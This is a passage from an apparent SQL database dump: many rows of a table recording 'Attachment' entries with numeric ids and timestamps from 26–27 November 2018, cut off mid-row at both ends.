19:34:10',NULL),(10465,2,'Attachment',327,'2018-11-26 19:34:13','2018-11-26 19:34:13',NULL),(10466,2,'Attachment',384,'2018-11-26 20:58:38','2018-11-26 20:58:38',NULL),(10467,2,'Attachment',385,'2018-11-26 23:29:22','2018-11-26 23:29:22',NULL),(10468,2,'Attachment',385,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10469,2,'Attachment',382,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10470,2,'Attachment',371,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10471,2,'Attachment',354,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10472,2,'Attachment',365,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10473,2,'Attachment',363,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10474,2,'Attachment',344,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10475,2,'Attachment',384,'2018-11-26 23:35:39','2018-11-26 23:35:39',NULL),(10476,2,'Attachment',218,'2018-11-26 23:35:54','2018-11-26 23:35:54',NULL),(10477,2,'Attachment',221,'2018-11-26 23:35:54','2018-11-26 23:35:54',NULL),(10478,2,'Attachment',335,'2018-11-26 23:35:54','2018-11-26 23:35:54',NULL),(10479,2,'Attachment',341,'2018-11-26 23:35:54','2018-11-26 23:35:54',NULL),(10480,2,'Attachment',266,'2018-11-26 23:35:54','2018-11-26 23:35:54',NULL),(10481,2,'Attachment',288,'2018-11-26 23:35:54','2018-11-26 23:35:54',NULL),(10482,2,'Attachment',344,'2018-11-27 01:59:28','2018-11-27 01:59:28',NULL),(10483,2,'Attachment',227,'2018-11-27 08:43:12','2018-11-27 08:43:12',NULL),(10484,2,'Attachment',259,'2018-11-27 08:53:09','2018-11-27 08:53:09',NULL),(10485,2,'Attachment',363,'2018-11-27 09:27:33','2018-11-27 09:27:33',NULL),(10486,2,'Attachment',260,'2018-11-27 09:58:44','2018-11-27 09:58:44',NULL),(10487,2,'Attachment',264,'2018-11-27 10:10:52','2018-11-27 10:10:52',NULL),(10488,2,'Attachment',265,'2018-11-27 10:31:57','2018-11-27 10:31:57',NULL),(10489,2,'Attachment',382,'2018-11-27 12:52:10','2018-11-27 12:52:10',NULL),(10490,2,'Attachment',371,'2018-11-27 12:52:11','2018-11-27 12:52:11',NULL),(10491,2,'Attachment',354,'2018-11-27 12:52:12','2018-11-27 12:52:12',NULL),(10492,2,'Attachment',365,'2018-11-27 12:52:12','2018-11-27 12:52:12',NULL),(10493,2,'Attachment',363,'2018-11-27 12:52:13','2018-11-27 12:52:13',NULL),(10494,2,'Attachment',344,'2018-11-27 12:52:14','2018-11-27 12:52:14',NULL),(10495,2,'Attachment',384,'2018-11-27 12:52:18','2018-11-27 12:52:18',NULL),(10496,2,'Attachment',385,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10497,2,'Attachment',365,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10498,2,'Attachment',371,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10499,2,'Attachment',382,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10500,2,'Attachment',354,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10501,2,'Attachment',363,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10502,2,'Attachment',344,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10503,2,'Attachment',384,'2018-11-27 13:49:40','2018-11-27 13:49:40',NULL),(10504,2,'Attachment',288,'2018-11-27 13:49:47','2018-11-27 13:49:47',NULL),(10505,2,'Attachment',341,'2018-11-27 13:49:47','2018-11-27 13:49:47',NULL),(10506,2,'Attachment',218,'2018-11-27 13:49:47','2018-11-27 13:49:47',NULL),(10507,2,'Attachment',266,'2018-11-27 13:49:47','2018-11-27 13:49:47',NULL),(10508,2,'Attachment',221,'2018-11-27 13:49:47','2018-11-27 13:49:47',NULL),(10509,2,'Attachment',335,'2018-11-27 13:49:47','2018-11-27 13:49:47',NULL),(10510,2,'Attachment',252,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10511,2,'Attachment',290,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10512,2,'Attachment',202,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10513,2,'Attachment',294,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10514,2,'Attachment',181,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10515,2,'Attachment',180,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10516,2,'Attachment',178,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10517,2,'Attachment',174,'2018-11-27 13:49:48','2018-11-27 13:49:48',NULL),(10518,2,'Attachment',38,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10519,2,'Attachment',57,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10520,2,'Attachment',69,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10521,2,'Attachment',105,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10522,2,'Attachment',216,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10523,2,'Attachment',152,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10524,2,'Attachment',25,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10525,2,'Attachment',14,'2018-11-27 13:49:52','2018-11-27 13:49:52',NULL),(10526,2,'Attachment',382,'2018-11-27 14:08:24','2018-11-27 14:08:24',NULL),(10527,2,'Attachment',267,'2018-11-27 14:49:17','2018-11-27 14:49:17',NULL),(10528,2,'Attachment',347,'2018-11-27 15:19:19','2018-11-27 15:19:19',NULL),(10529,2,'Attachment',383,'2018-11-27 15:29:07','2018-11-27 15:29:07',NULL),(10530,2,'Attachment',385,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10531,2,'Attachment',382,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10532,2,'Attachment',363,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10533,2,'Attachment',371,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10534,2,'Attachment',365,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10535,2,'Attachment',354,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10536,2,'Attachment',384,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10537,2,'Attachment',344,'2018-11-27 15:33:28','2018-11-27 15:33:28',NULL),(10538,2,'Attachment',341,'2018-11-27 15:33:44','2018-11-27 15:33:44',NULL),(10539,2,'Attachment',252,'2018-11-27 15:33:44','2018-11-27 15:33:44',NULL),(10540,2,'Attachment',266,'2018-11-27 15:33:44','2018-11-27 15:33:44',NULL),(10541,2,'Attachment',152,'2018-11-27 15:33:44','2018-11-27 15:33:44',NULL),(10542,2,'Attachment',178,'2018-11-27 15:33:48','2018-11-27 15:33:48',NULL),(10543,2,'Attachment',202,'2018-11-27 15:33:48','2018-11-27 15:33:48',NULL),(10544,2,'Attachment',105,'2018-11-27 15:33:48','2018-11-27 15:33:48',NULL),(10545,2,'Attachment',174,'2018-11-27 15:33:48','2018-11-27 15:33:48',NULL),(10546,2,'Attachment',38,'2018-11-27 15:33:48','2018-11-27 15:33:48',NULL),(10547,2,'Attachment',216,'2018-11-27 15:33:48','2018-11-27 15:33:48',NULL),(10548,2,'Attachment',385,'2018-11-27 15:45:26','2018-11-27 15:45:26',NULL),(10549,2,'Attachment',382,'2018-11-27 15:45:26','2018-11-27 15:45:26',NULL),(10550,2,'Attachment',371,'2018-11-27 15:45:26','2018-11-27 15:45:26',NULL),(10551,2,'Attachment',354,'2018-11-27 15:45:26','2018-11-27 15:45:26',NULL),(10552,2,'Attachment',344,'2018-11-27 15:45:27','2018-11-27 15:45:27',NULL),(10553,2,'Attachment',365,'2018-11-27 15:45:27','2018-11-27 15:45:27',NULL),(10554,2,'Attachment',363,'2018-11-27 15:45:27','2018-11-27 15:45:27',NULL),(10555,2,'Attachment',384,'2018-11-27 15:45:27','2018-11-27 15:45:27',NULL),(10556,2,'Attachment',27,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10557,2,'Attachment',15,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10558,2,'Attachment',43,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10559,2,'Attachment',41,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10560,2,'Attachment',42,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10561,2,'Attachment',26,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10562,2,'Attachment',44,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10563,2,'Attachment',45,'2018-11-27 16:19:25','2018-11-27 16:19:25',NULL),(10564,2,'Attachment',266,'2018-11-27 16:21:50','2018-11-27 16:21:50',NULL),(10565,2,'Attachment',152,'2018-11-27 16:21:50','2018-11-27 16:21:50',NULL),(10566,2,'Attachment',252,'2018-11-27 16:21:50','2018-11-27 16:21:50',NULL),(10567,2,'Attachment',341,'2018-11-27 16:21:50','2018-11-27 16:21:50',NULL),(10568,2,'Attachment',202,'2018-11-27 16:21:51','2018-11-27 16:21:51',NULL),(10569,2,'Attachment',178,'2018-11-27 16:21:51','2018-11-27 16:21:51',NULL),(10570,2,'Attachment',174,'2018-11-27 16:21:51','2018-11-27 16:21:51',NULL),(10571,2,'Attachment',105,'2018-11-27 16:21:51','2018-11-27 16:21:51',NULL),(10572,2,'Attachment',216,'2018-11-27 16:21:51','2018-11-27 16:21:51',NULL),(10573,2,'Attachment',38,'2018-11-27 16:21:51','2018-11-27 16:21:51',NULL),(10574,2,'Attachment',27,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10575,2,'Attachment',26,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10576,2,'Attachment',15,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10577,2,'Attachment',25,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10578,2,'Attachment',37,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10579,2,'Attachment',35,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10580,2,'Attachment',33,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10581,2,'Attachment',34,'2018-11-27 16:21:53','2018-11-27 16:21:53',NULL),(10582,2,'Attachment',30,'2018-11-27 16:21:55','2018-11-27 16:21:55',NULL),(10583,2,'Attachment',32,'2018-11-27 16:21:55','2018-11-27 16:21:55',NULL),(10584,2,'Attachment',31,'2018-11-27 16:21:55','2018-11-27 16:21:55',NULL),(10585,2,'Attachment',385,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10586,2,'Attachment',382,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10587,2,'Attachment',371,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10588,2,'Attachment',354,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10589,2,'Attachment',363,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10590,2,'Attachment',365,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10591,2,'Attachment',384,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10592,2,'Attachment',344,'2018-11-27 16:21:58','2018-11-27 16:21:58',NULL),(10593,2,'Attachment',344,'2018-11-27 16:23:18','2018-11-27 16:23:18',NULL),(10594,2,'Attachment',385,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10595,2,'Attachment',382,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10596,2,'Attachment',354,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10597,2,'Attachment',371,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10598,2,'Attachment',365,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10599,2,'Attachment',363,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10600,2,'Attachment',344,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10601,2,'Attachment',384,'2018-11-27 16:25:23','2018-11-27 16:25:23',NULL),(10602,2,'Attachment',266,'2018-11-27 16:25:31','2018-11-27 16:25:31',NULL),(10603,2,'Attachment',252,'2018-11-27 16:25:31','2018-11-27 16:25:31',NULL),(10604,2,'Attachment',341,'2018-11-27 16:25:31','2018-11-27 16:25:31',NULL),(10605,2,'Attachment',152,'2018-11-27 16:25:31','2018-11-27 16:25:31',NULL),(10606,2,'Attachment',180,'2018-11-27 16:25:37','2018-11-27 16:25:37',NULL),(10607,2,'Attachment',288,'2018-11-27 16:25:37','2018-11-27 16:25:37',NULL),(10608,2,'Attachment',69,'2018-11-27 16:25:37','2018-11-27 16:25:37',NULL),(10609,2,'Attachment',14,'2018-11-27 16:25:37','2018-11-27 16:25:37',NULL),(10610,2,'Attachment',24,'2018-11-27 16:25:39','2018-11-27 16:25:39',NULL),(10611,2,'Attachment',29,'2018-11-27 16:25:39','2018-11-27 16:25:39',NULL),(10612,2,'Attachment',385,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10613,2,'Attachment',363,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10614,2,'Attachment',382,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10615,2,'Attachment',354,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10616,2,'Attachment',365,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10617,2,'Attachment',344,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10618,2,'Attachment',384,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10619,2,'Attachment',371,'2018-11-27 16:25:42','2018-11-27 16:25:42',NULL),(10620,2,'Attachment',294,'2018-11-27 16:25:44','2018-11-27 16:25:44',NULL),(10621,2,'Attachment',335,'2018-11-27 16:25:44','2018-11-27 16:25:44',NULL),(10622,2,'Attachment',49,'2018-11-27 16:25:44','2018-11-27 16:25:44',NULL),(10623,2,'Attachment',280,'2018-11-27 16:25:44','2018-11-27 16:25:44',NULL),(10624,2,'Attachment',290,'2018-11-27 16:25:44','2018-11-27 16:25:44',NULL),(10625,2,'Attachment',50,'2018-11-27 16:25:44','2018-11-27 16:25:44',NULL),(10626,2,'Attachment',274,'2018-11-27 16:25:44','2018-11-27 16:25:44',NULL),(10627,2,'Attachment',42,'2018-11-27 16:25:46','2018-11-27 16:25:46',NULL),(10628,2,'Attachment',41,'2018-11-27 16:25:46','2018-11-27 16:25:46',NULL),(10629,2,'Attachment',43,'2018-11-27 16:25:46','2018-11-27 16:25:46',NULL),(10630,2,'Attachment',48,'2018-11-27 16:25:48','2018-11-27 16:25:48',NULL),(10631,2,'Attachment',46,'2018-11-27 16:25:48','2018-11-27 16:25:48',NULL),(10632,2,'Attachment',45,'2018-11-27 16:25:48','2018-11-27 16:25:48',NULL),(10633,2,'Attachment',9,'2018-11-27 16:25:48','2018-11-27 16:25:48',NULL),(10634,2,'Attachment',40,'2018-11-27 16:25:48','2018-11-27 16:25:48',NULL),(10635,2,'Attachment',47,'2018-11-27 16:25:48','2018-11-27 16:25:48',NULL),(10636,2,'Attachment',38,'2018-11-27 16:25:54','2018-11-27 16:25:54',NULL),(10637,2,'Attachment',105,'2018-11-27 16:25:54','2018-11-27 16:25:54',NULL),(10638,2,'Attachment',174,'2018-11-27 16:25:54','2018-11-27 16:25:54',NULL),(10639,2,'Attachment',178,'2018-11-27 16:25:54','2018-11-27 16:25:54',NULL),(10640,2,'Attachment',202,'2018-11-27 16:25:54','2018-11-27 16:25:54',NULL),(10641,2,'Attachment',216,'2018-11-27 16:25:54','2018-11-27 16:25:54',NULL),(10642,2,'Attachment',25,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10643,2,'Attachment',27,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10644,2,'Attachment',26,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10645,2,'Attachment',37,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10646,2,'Attachment',15,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10647,2,'Attachment',35,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10648,2,'Attachment',34,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10649,2,'Attachment',33,'2018-11-27 16:25:59','2018-11-27 16:25:59',NULL),(10650,2,'Attachment',31,'2018-11-27 16:26:04','2018-11-27 16:26:04',NULL),(10651,2,'Attachment',30,'2018-11-27 16:26:04','2018-11-27 16:26:04',NULL),(10652,2,'Attachment',32,'2018-11-27 16:26:04','2018-11-27 16:26:04',NULL),(10653,2,'Attachment',340,'2018-11-27 16:26:21','2018-11-27 16:26:21',NULL),(10654,2,'Attachment',385,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10655,2,'Attachment',382,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10656,2,'Attachment',354,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10657,2,'Attachment',365,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10658,2,'Attachment',371,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10659,2,'Attachment',363,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10660,2,'Attachment',384,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10661,2,'Attachment',344,'2018-11-27 16:27:46','2018-11-27 16:27:46',NULL),(10662,2,'Attachment',266,'2018-11-27 16:28:06','2018-11-27 16:28:06',NULL),(10663,2,'Attachment',288,'2018-11-27 16:28:06','2018-11-27 16:28:06',NULL),(10664,2,'Attachment',221,'2018-11-27 16:28:06','2018-11-27 16:28:06',NULL),(10665,2,'Attachment',218,'2018-11-27 16:28:06','2018-11-27 16:28:06',NULL),(10666,2,'Attachment',335,'2018-11-27 16:28:06','2018-11-27 16:28:06',NULL),(10667,2,'Attachment',341,'2018-11-27 16:28:06','2018-11-27 16:28:06',NULL),(10668,2,'Attachment',202,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10669,2,'Attachment',252,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10670,2,'Attachment',180,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10671,2,'Attachment',290,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10672,2,'Attachment',294,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10673,2,'Attachment',181,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10674,2,'Attachment',178,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10675,2,'Attachment',174,'2018-11-27 16:28:21','2018-11-27 16:28:21',NULL),(10676,2,'Attachment',69,'2018-11-27 16:28:33','2018-11-27 16:28:33',NULL),(10677,2,'Attachment',14,'2018-11-27 16:28:33','2018-11-27 16:28:33',NULL),(10678,2,'Attachment',152,'2018-11-27 16:28:35','2018-11-27 16:28:35',NULL),(10679,2,'Attachment',57,'2018-11-27 16:28:36','2018-11-27 16:28:36',NULL),(10680,2,'Attachment',28,'2018-11-27 16:28:36','2018-11-27 16:28:36',NULL),(10681,2,'Attachment',280,'2018-11-27 16:28:38','2018-11-27 16:28:38',NULL),(10682,2,'Attachment',49,'2018-11-27 16:28:38','2018-11-27 16:28:38',NULL),(10683,2,'Attachment',50,'2018-11-27 16:28:38','2018-11-27 16:28:38',NULL),(10684,2,'Attachment',274,'2018-11-27 16:28:38','2018-11-27 16:28:38',NULL),(10685,2,'Attachment',41,'2018-11-27 16:28:40','2018-11-27 16:28:40',NULL),(10686,2,'Attachment',42,'2018-11-27 16:28:40','2018-11-27 16:28:40',NULL),(10687,2,'Attachment',43,'2018-11-27 16:28:40','2018-11-27 16:28:40',NULL),(10688,2,'Attachment',288,'2018-11-27 16:30:58','2018-11-27 16:30:58',NULL),(10689,2,'Attachment',180,'2018-11-27 16:30:58','2018-11-27 16:30:58',NULL),(10690,2,'Attachment',69,'2018-11-27 16:30:58','2018-11-27 16:30:58',NULL),(10691,2,'Attachment',14,'2018-11-27 16:30:58','2018-11-27 16:30:58',NULL),(10692,2,'Attachment',252,'2018-11-27 16:30:59','2018-11-27 16:30:59',NULL),(10693,2,'Attachment',266,'2018-11-27 16:30:59','2018-11-27 16:30:59',NULL),(10694,2,'Attachment',152,'2018-11-27 16:30:59','2018-11-27 16:30:59',NULL),(10695,2,'Attachment',341,'2018-11-27 16:30:59','2018-11-27 16:30:59',NULL),(10696,2,'Attachment',181,'2018-11-27 16:30:59','2018-11-27 16:30:59',NULL),(10697,2,'Attachment',28,'2018-11-27 16:30:59','2018-11-27 16:30:59',NULL),(10698,2,'Attachment',57,'2018-11-27 16:30:59','2018-11-27 16:30:59',NULL),(10699,2,'Attachment',294,'2018-11-27 16:31:01','2018-11-27 16:31:01',NULL),(10700,2,'Attachment',290,'2018-11-27 16:31:01','2018-11-27 16:31:01',NULL),(10701,2,'Attachment',335,'2018-11-27 16:31:01','2018-11-27 16:31:01',NULL),(10702,2,'Attachment',49,'2018-11-27 16:31:01','2018-11-27 16:31:01',NULL),(10703,2,'Attachment',50,'2018-11-27 16:31:01','2018-11-27 16:31:01',NULL),(10704,2,'Attachment',280,'2018-11-27 16:31:01','2018-11-27 16:31:01',NULL),(10705,2,'Attachment',274,'2018-11-27 16:31:01','2018-11-27 16:31:01',NULL),(10706,2,'Attachment',42,'2018-11-27 16:31:02','2018-11-27 16:31:02',NULL),(10707,2,'Attachment',41,'2018-11-27 16:31:02','2018-11-27 16:31:02',NULL),(10708,2,'Attachment',43,'2018-11-27 16:31:02','2018-11-27 16:31:02',NULL),(10709,2,'Attachment',47,'2018-11-27 16:31:11','2018-11-27 16:31:11',NULL),(10710,2,'Attachment',48,'2018-11-27 16:31:11','2018-11-27 16:31:11',NULL),(10711,2,'Attachment',45,'2018-11-27 16:31:11','2018-11-27 16:31:11',NULL),(10712,2,'Attachment',9,'2018-11-27 16:31:11','2018-11-27 16:31:11',NULL),(10713,2,'Attachment',40,'2018-11-27 16:31:11','2018-11-27 16:31:11',NULL),(10714,2,'Attachment',46,'2018-11-27 16:31:11','2018-11-27 16:31:11',NULL),(10715,2,'Attachment',385,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10716,2,'Attachment',371,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10717,2,'Attachment',382,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10718,2,'Attachment',354,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10719,2,'Attachment',365,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10720,2,'Attachment',363,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10721,2,'Attachment',384,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10722,2,'Attachment',344,'2018-11-27 16:43:59','2018-11-27 16:43:59',NULL),(10723,2,'Attachment',266,'2018-11-27 16:44:03','2018-11-27 16:44:03',NULL),(10724,2,'Attachment',335,'2018-11-27 16:44:03','2018-11-27 16:44:03',NULL),(10725,2,'Attachment',341,'2018-11-27 16:44:03','2018-11-27 16:44:03',NULL),(10726,2,'Attachment',218,'2018-11-27 16:44:03','2018-11-27 16:44:03',NULL),(10727,2,'Attachment',288,'2018-11-27 16:44:03','2018-11-27 16:44:03',NULL),(10728,2,'Attachment',221,'2018-11-27 16:44:03','2018-11-27 16:44:03',NULL),(10729,2,'Attachment',180,'2018-11-27 16:44:05','2018-11-27 16:44:05',NULL),(10730,2,'Attachment',69,'2018-11-27 16:44:05','2018-11-27 16:44:05',NULL),(10731,2,'Attachment',14,'2018-11-27 16:44:05','2018-11-27 16:44:05',NULL),(10732,2,'Attachment',152,'2018-11-27 16:44:06','2018-11-27 16:44:06',NULL),(10733,2,'Attachment',252,'2018-11-27 16:44:06','2018-11-27 16:44:06',NULL),(10734,2,'Attachment',181,'2018-11-27 16:44:07','2018-11-27 16:44:07',NULL),(10735,2,'Attachment',57,'2018-11-27 16:44:07','2018-11-27 16:44:07',NULL),(10736,2,'Attachment',28,'2018-11-27 16:44:07','2018-11-27 16:44:07',NULL),(10737,2,'Attachment',290,'2018-11-27 16:44:08','2018-11-27 16:44:08',NULL),(10738,2,'Attachment',49,'2018-11-27 16:44:08','2018-11-27 16:44:08',NULL),(10739,2,'Attachment',294,'2018-11-27 16:44:08','2018-11-27 16:44:08',NULL),(10740,2,'Attachment',50,'2018-11-27 16:44:08','2018-11-27 16:44:08',NULL),(10741,2,'Attachment',280,'2018-11-27 16:44:08','2018-11-27 16:44:08',NULL),(10742,2,'Attachment',274,'2018-11-27 16:44:08','2018-11-27 16:44:08',NULL),(10743,2,'Attachment',384,'2018-11-27 16:49:50','2018-11-27 16:49:50',NULL),(10744,2,'Attachment',385,'2018-11-27 16:59:38','2018-11-27 16:59:38',NULL),(10745,2,'Attachment',385,'2018-11-27 17:13:11','2018-11-27 17:13:11',NULL),(10746,2,'Attachment',382,'2018-11-27 17:13:11','2018-11-27 17:13:11',NULL),(10747,2,'Attachment',371,'2018-11-27 17:13:11','2018-11-27 17:13:11',NULL),(10748,2,'Attachment',354,'2018-11-27 17:13:11','2018-11-27 17:13:11',NULL),(10749,2,'Attachment',365,'2018-11-27 17:13:11','2018-11-27 17:13:11',NULL),(10750,2,'Attachment',363,'2018-11-27 17:13:11','2018-11-27 17:13:11',NULL),(10751,2,'Attachment',344,'2018-11-27 17:13:11','2018-11-27 17:13:11',NULL),(10752,2,'Attachment',384,'2018-11-27 17:13:12','2018-11-27 17:13:12',NULL),(10753,2,'Attachment',341,'2018-11-27 17:13:27','2018-11-27 17:13:27',NULL),(10754,2,'Attachment',335,'2018-11-27 17:13:27','2018-11-27 17:13:27',NULL),(10755,2,'Attachment',288,'2018-11-27 17:13:27','2018-11-27 17:13:27',NULL),(10756,2,'Attachment',218,'2018-11-27 17:13:27','2018-11-27 17:13:27',NULL),(10757,2,'Attachment',266,'2018-11-27 17:13:27','2018-11-27 17:13:27',NULL),(10758,2,'Attachment',221,'2018-11-27 17:13:27','2018-11-27 17:13:27',NULL),(10759,2,'Attachment',343,'2018-11-27 17:13:39','2018-11-27 17:13:39',NULL),(10760,2,'Attachment',290,'2018-11-27 17:33:07','2018-11-27 17:33:07',NULL),(10761,2,'Attachment',181,'2018-11-27 17:33:07','2018-11-27 17:33:07',NULL),(10762,2,'Attachment',252,'2018-11-27 17:33:07','2018-11-27 17:33:07',NULL),(10763,2,'Attachment',180,'2018-11-27 17:33:07','2018-11-27 17:33:07',NULL),(10764,2,'Attachment',294,'2018-11-27 17:33:07','2018-11-27 17:33:07',NULL),(10765,2,'Attachment',202,'2018-11-27 17:33:07','2018-11-27 17:33:07',NULL),(10766,2,'Attachment',178,'2018-11-27 17:33:08','2018-11-27 17:33:08',NULL),(10767,2,'Attachment',174,'2018-11-27 17:33:08','2018-11-27 17:33:08',NULL),(10768,2,'Attachment',57,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10769,2,'Attachment',152,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10770,2,'Attachment',69,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10771,2,'Attachment',105,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10772,2,'Attachment',216,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10773,2,'Attachment',38,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10774,2,'Attachment',25,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10775,2,'Attachment',14,'2018-11-27 17:33:09','2018-11-27 17:33:09',NULL),(10776,2,'Attachment',26,'2018-11-27 17:33:19','2018-11-27 17:33:19',NULL),(10777,2,'Attachment',41,'2018-11-27 17:33:19','2018-11-27 17:33:19',NULL),(10778,2,'Attachment',27,'2018-11-27 17:33:19','2018-11-27 17:33:19',NULL),(10779,2,'Attachment',43,'2018-11-27 17:33:19','2018-11-27 17:33:19',NULL),(10780,2,'Attachment',15,'2018-11-27 17:33:19','2018-11-27 17:33:19',NULL),(10781,2,'Attachment',42,'2018-11-27 17:33:19','2018-11-27 17:33:19',NULL),(10782,2,'Attachment',44,'2018-11-27 17:33:20','2018-11-27 17:33:20',NULL),(10783,2,'Attachment',45,'2018-11-27 17:33:20','2018-11-27 17:33:20',NULL),(10784,2,'Attachment',217,'2018-11-27 17:35:49','2018-11-27 17:35:49',NULL),(10785,2,'Attachment',203,'2018-11-27 17:37:34','2018-11-27 17:37:34',NULL),(10786,2,'Attachment',204,'2018-11-27 17:37:34','2018-11-27 17:37:34',NULL),(10787,2,'Attachment',208,'2018-11-27 17:37:34','2018-11-27 17:37:34',NULL),(10788,2,'Attachment',205,'2018-11-27 17:37:34','2018-11-27 17:37:34',NULL),(10789,2,'Attachment',207,'2018-11-27 17:37:34','2018-11-27 17:37:34',NULL),(10790,2,'Attachment',206,'2018-11-27 17:37:34','2018-11-27 17:37:34',NULL),(10791,2,'Attachment',209,'2018-11-27 17:37:35','2018-11-27 17:37:35',NULL),(10792,2,'Attachment',210,'2018-11-27 17:37:35','2018-11-27 17:37:35',NULL),(10793,2,'Attachment',211,'2018-11-27 17:37:36','2018-11-27 17:37:36',NULL),(10794,2,'Attachment',212,'2018-11-27 17:37:36','2018-11-27 17:37:36',NULL),(10795,2,'Attachment',213,'2018-11-27 17:37:37','2018-11-27 17:37:37',NULL),(10796,2,'Attachment',214,'2018-11-27 17:37:38','2018-11-27 17:37:38',NULL),(10797,2,'Attachment',175,'2018-11-27 17:40:36','2018-11-27 